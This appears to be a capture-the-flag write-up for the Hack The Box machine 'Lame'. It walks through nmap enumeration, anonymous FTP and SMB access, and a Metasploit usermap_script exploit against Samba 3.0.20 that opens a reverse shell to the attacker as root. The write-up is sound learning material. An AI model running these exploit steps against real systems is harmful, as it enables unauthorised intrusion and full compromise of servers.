Lame is the first box on HTB and it is very easy: a vulnerable SMB service hands over a root shell directly, so no privilege escalation is needed afterwards.
Enumeration
Nmap
# Nmap 7.92 scan initiated Tue Dec 21 09:50:52 2021 as: nmap -sC -sV -oN nmap2.out 10.10.10.3
Nmap scan report for lame.htb (10.10.10.3)
Host is up (0.31s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.6
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name:
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-12-20T22:30:54-05:00
|_clock-skew: mean: 2h39m30s, deviation: 3h32m10s, median: 9m28s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 21 09:52:04 2021 -- 1 IP address (1 host up) scanned in 72.30 seconds
Four ports are open (FTP, SSH and SMB on 139/445), and the FTP service allows anonymous login. Note the exact SMB version string from the 445/tcp line, Samba 3.0.20-Debian: that is what the rest of the attack is built on.
FTP Anonymous
┌─[sheinn101@parrot]─[~/htb/lame]
└──╼ $ ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:sheinn101): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
But there are no interesting files on the anonymous FTP share, so we move on to SMB.
SMB Enumeration
Listing shares with smbclient works without credentials (anonymous login succeeds), and the share comments confirm the version seen by nmap: Samba 3.0.20-Debian.
┌─[sheinn101@parrot]─[~/htb/lame]
└──╼ $ smbclient -L 10.10.10.3
Enter WORKGROUP\sheinn101's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            LAME
┌─[sheinn101@parrot]─[~/htb/lame]
└──╼ $
Let's search Metasploit for an exploit matching that version.
Getting Root with Metasploit
msf6 > search Samba 3.0.20

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 >
After selecting the module (use 0), set the target and the interface the reverse handler should listen on, then run it. The session that comes back is already root, so there is nothing left to escalate:

msf6 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set lhost tun0
lhost => tun0
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Command shell session 1 opened (10.10.14.6:4444 -> 10.10.10.3:32852) at 2021-12-21 13:27:48 +0630
id
uid=0(root) gid=0(root)
whoami
root